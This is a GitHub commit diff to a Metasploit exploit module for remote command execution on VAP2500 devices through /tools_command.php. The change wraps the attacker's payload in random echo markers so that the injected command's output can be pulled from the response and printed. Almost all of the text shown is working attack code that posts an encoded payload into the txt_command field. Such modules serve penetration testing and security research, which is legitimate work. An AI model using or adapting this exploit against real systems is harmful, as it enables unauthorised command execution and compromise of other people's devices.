Skip to content

Commit 8d1ca87

Browse files
committed
Now with logging of command response output
1 parent 564488a commit 8d1ca87

File tree

1 file changed

+6
-1
lines changed

1 file changed

+6
-1
lines changed

modules/exploits/linux/http/vap2500_tools_command_exec.rb

Lines changed: 6 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -77,13 +77,15 @@ def exploit
7777
print_status("#{peer} - Exploiting...")
7878

7979
uri = '/tools_command.php'
80+
beg_boundary = rand_text_alpha(8)
81+
end_boundary = rand_text_alpha(8)
8082

8183
begin
8284
res = send_request_cgi({
8385
'uri' => uri,
8486
'vars_post' => {
8587
'cmb_header' => '',
86-
'txt_command' => payload.encoded
88+
'txt_command' => "echo #{beg_boundary}; #{payload.encoded}; echo #{end_boundary}"
8789
},
8890
'method' => 'POST',
8991
'headers' => {
@@ -92,6 +94,9 @@ def exploit
9294
})
9395
if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/
9496
print_good("#{peer} - Command sent successfully")
97+
if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m
98+
print_status("#{peer} - Command output: #{$1}")
99+
end
95100
else
96101
fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed")
97102
end

0 commit comments

Comments
 (0)